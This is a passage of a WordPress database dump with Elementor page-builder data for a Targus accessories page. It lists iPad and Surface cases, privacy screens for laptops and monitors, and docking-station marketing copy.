id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054db58\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6196c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"39f71bf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"208ace1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd3ee9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26b4f3b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>12.9-inch\\u00a0<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ750GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a121f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"674bee1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>SafePort Rugged <\\/strong><strong>Case for <\\/strong><strong>12.9-inch iPad <\\/strong><strong>(6th gen. \\/ 5th gen.)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD138GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2bed517\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aae738f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6a9f2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Signature Series Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a7759bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c62f212\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cb966a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ba550a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da4bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4bdd233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6c9e329\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch)<\\/li><li>Form-fit TPU shell with USA Military-Spec drop protection \\u2013 protects your device from 1.2m\\/4ft drops<\\/li><li>Offers rugged protection in a slim, professional-looking case<\\/li><li>Sound enhancing scoops for all iPad speakers<\\/li><li>Integrated stand for stable viewing and comfortable typing<\\/li><li>Optional detachable shoulder strap (THA101GLZ)<\\/li><li>Compatible with the ambient light sensor and mic on your device<\\/li><li>Clear window on back to display asset tag<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b71a0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26da7ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7094b67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c542f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3243ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d729ea6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"60d35e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84813a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46d1844\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5da049f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ac39cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ779GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f231dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db2432a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD491GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8dc8da\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1953aa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac8efa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\\\" width=\\\"193\\\" height=\\\"193\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"398b7f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2b1f7b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b76d24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84599d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02e1d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Non-slip interior for infinite viewing angles<\\/li><li>Integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"56f840c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"829e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)<\\/li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6b2856\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33e8d3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d4063c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ef704\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61e6c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da0626d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a354cbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8006a3f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cda527\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"12faef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3eb43c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Sceen\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6314953\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78877de\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"468758b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Apple Macbook<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b6689d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1e7d8da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"6e8f169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\\\" alt=\\\"Magnetic Privacy Screen for 13.3\\\" width=\\\"274\\\" height=\\\"274\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61fa17e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7efc979\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Magnetic Privacy Screen for Apple MacBook<\\/strong><\\/h2><ul id=\\\"product-features\\\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes<\\/li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Available\\u00a0 for :-<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>MacBook 12-inch (ASM12MBGL)<\\/h4><\\/li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)<\\/h4><\\/li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)<\\/h4><\\/li><li><h4>MacBook 15.4-inch (ASM154MBGL)<\\/h4><\\/li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d9f0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"08b3411\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"524d5be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e7590b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"975bc53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05e81b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83489ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ae0925b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ffd343a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Microsoft Surface<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e15e040\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9454e78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"95d0520\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\\\" alt=\\\"Privacy Screen Microsoft Surface Pro 4 (12.3\\\" width=\\\"215\\\" height=\\\"215\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7666383\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"da26715\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">\\u00a0Microsoft Surface Pro 4 (12.3\\\") - Clear<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for the\\u00a0Microsoft Surface Pro 4 (12.3\\\") tablet<\\/li><li>Works with touch screen<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\\\"https:\\/\\/uk.targus.com\\/pages\\/keep-your-business-your-business\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><u><br \\/><\\/u><\\/a><\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1cbe15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"182a368\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd7176c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48594a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8dd9cb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff73127\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99d1e23\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"868d42c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f0f8ace\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Laptop<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"26653f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7b30821\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"53def41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 11.6\\\" width=\\\"307\\\" height=\\\"307\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8342f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"76157d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for tablet, laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 11.6\\\"W - 16:9 (ASF116W9EU)<\\/h4><\\/li><li><h4>Screen 12.1\\\"W - 16:10 (ASF121WEU)<\\/h4><\\/li><li><h4>Screen 12.5\\\"W - 16:9 (ASF125W9EU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W - 16:10 (ASF133WEU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:9 - (ASF133W9EU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:10 - (ASF141WEU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:9 - (ASF141W9EU)<\\/h4><\\/li><li><h4>Screen 14\\u201d W 16:9 - (ASF14W9EU)<\\/h4><\\/li><li><h4>Screen 15.4\\\"W 16:10 - (ASF154WEU)<\\/h4><\\/li><li><h4>Screen 15.6\\\"W 16:9 - (ASF156W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e074c0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b967aae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d7859f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf78a0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e7dda\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dcf0830\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9b6734e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a21cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ccba5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Monitor<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8be1a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a283150\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"485c58c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 17\\\" width=\\\"269\\\" height=\\\"269\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70e84b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"05a0a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 17\\\" 4:3 - (ASF170EU)<\\/h4><\\/li><li><h4>Screen 19\\\" 4:3 - (ASF190EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 16:10 - (ASF19WEU)<\\/h4><\\/li><li><h4>Screen 21.5\\\"W 16:9 - (ASF215W9EU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:10 - (ASF220WEU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:9 - (ASF22W9EU)<\\/h4><\\/li><li><h4>Screen 23\\\"W 16:9 - (ASF23W9EU)<\\/h4><\\/li><li><h4>Screen 23.8\\\"W 16:9 - (ASF238W9EU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:10 - (ASF24WEU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:9 - (ASF24W9EU)<\\/h4><\\/li><li><h4>Screen 27\\\"W 16:9 - (ASF27W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a1a9a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"058d29d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d3d9795\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8920,3700,'_elementor_css','a:5:{s:4:\"time\";i:1573015073;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8923,3701,'_wp_page_template','template-fullwidth.php'),(8924,3701,'_elementor_edit_mode','builder'),(8925,3701,'_elementor_template_type','wp-page'),(8926,3701,'_elementor_version','2.7.4'),(8927,3701,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all 